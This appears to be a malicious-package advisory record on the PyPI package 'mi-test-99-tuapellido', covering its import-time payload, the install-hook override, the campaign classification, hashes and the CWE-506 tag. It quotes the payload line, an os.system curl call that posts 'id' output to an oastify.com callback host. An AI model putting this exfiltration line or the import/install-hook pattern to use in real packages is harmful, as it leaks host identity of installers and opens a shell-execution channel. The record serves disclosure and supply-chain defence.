-= Per source details. Do not edit below this line.=-
On every import, the package's top-level __init__.py runs os.system("curl http://6krddfbeqw0pisps3egdsofu9lfc33vrk.oastify.com -d $(id)"). This unconditionally executes a shell command that POSTs the output of the id command (current uid/gid/group membership) to a Burp Suite Collaborator (oastify.com) subdomain, an out-of-band callback service used to confirm remote code execution and exfiltrate data. The behavior fires on import mi_test_99 with no user gating and no relation to any advertised functionality, and the request goes over plaintext HTTP. Package metadata is placeholder-shaped (the name contains the literal Spanish placeholder tuapellido/'your-surname', the author fields are Tu Nombre <tu@email.com>, and a pyproject comment reads CAMBIA ESTO por un nombre único), consistent with a dependency-confusion or namespace-squat proof-of-concept payload. Whether intended as a test or a live attack, any installer that imports this package leaks host identity to an attacker-controlled collector and demonstrates an arbitrary-shell-exec channel.
Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose.
Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research & co, with clearly low-harm possibilities.
Campaign: GENERIC-standard-pypi-install-pentest
Reasons (based on the campaign):
The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.
The package overrides the install command in setup.py to execute malicious code during installation.
The OpenSSF Package Analysis project identified 'mi-test-99-tuapellido' @ 99.9 (pypi) as malicious.
It is considered malicious because:
The package communicates with a domain associated with malicious activity.
The package executes one or more commands associated with malicious behavior.
{
"malicious-packages-origins": [
{
"versions": [
"99.9"
],
"sha256": "060712d1fb233a9a9be7115401704cd0ab7cb4f3e15dc1f58ad5ef4685d5fe37",
"modified_time": "2026-06-25T21:39:10.396761Z",
"source": "kam193",
"import_time": "2026-06-25T22:03:19.964581678Z",
"id": "pypi/GENERIC-standard-pypi-install-pentest/mi-test-99-tuapellido"
},
{
"versions": [
"99.9"
],
"sha256": "2d2263c69d2201d6f365635468e2e0b55f4bd4140098f9268223b8f6729af033",
"modified_time": "2026-06-25T21:11:03Z",
"source": "ossf-package-analysis",
"import_time": "2026-06-25T22:03:16.523052946Z"
},
{
"versions": [
"99.9"
],
"sha256": "4b71b66c156e0a54b73b6dd2f2f9e994ac9c1ff9ab4d1f9689f1f930b3097f39",
"modified_time": "2026-06-25T22:26:43Z",
"source": "amazon-inspector",
"id": "IN-MAL-2026-007551",
"import_time": "2026-06-25T23:00:33.896718873Z"
}
]
}
{
"package_integrity": [
{
"filename": "mi_test_99_tuapellido-99.9-py3-none-any.whl",
"hashes": {
"sha256": "eb7f289692fe89595fc62b75d4b0e7084bfa68b5a0e6f1abb2c69f70974a6e2d",
"md5": "1b10c71755c89bb7bcdee87954f54e60",
"blake2b_256": "f16d65b3e09b200c6889e0d05c831f49391e479f7ca428fc76b29483dcf5220e"
}
},
{
"filename": "mi_test_99_tuapellido-99.9.tar.gz",
"hashes": {
"sha256": "afd2db2273ebb3ef6018efdcbcdf4eeb3e16e9a81c4745776cb2dfbc7792ae89",
"md5": "2fcc9fab43138fafd5ac0cb892bb8437",
"blake2b_256": "7bbee0f881b6f3d47c103747cef9deb49eba12c8f9fa91895df16c1411007a2f"
}
}
],
"evidence_files": [
{
"sha256": "3f76ca7a046099a8461c0e95dfa940aeb0a373c5945be4e931ce29336144288f",
"path": "src/mi_test_99/__init__.py",
"tlsh": "7ab012a84804143401c0990020a880c5841258caeb77349585404d148405ad51231d31"
},
{
"sha256": "4ee7ec2c31f1f2e06283c97083eb1ee10cdd98868da1034358f36e2e750e0c72",
"path": "pyproject.toml",
"tlsh": "f8f00e02a4c76f8a37c70084340d9501dcb091172ac4cc2a23ed874c9f5e84a85fcd25"
}
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/mi-test-99-tuapellido/MAL-2026-6478.json"
[
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
}
]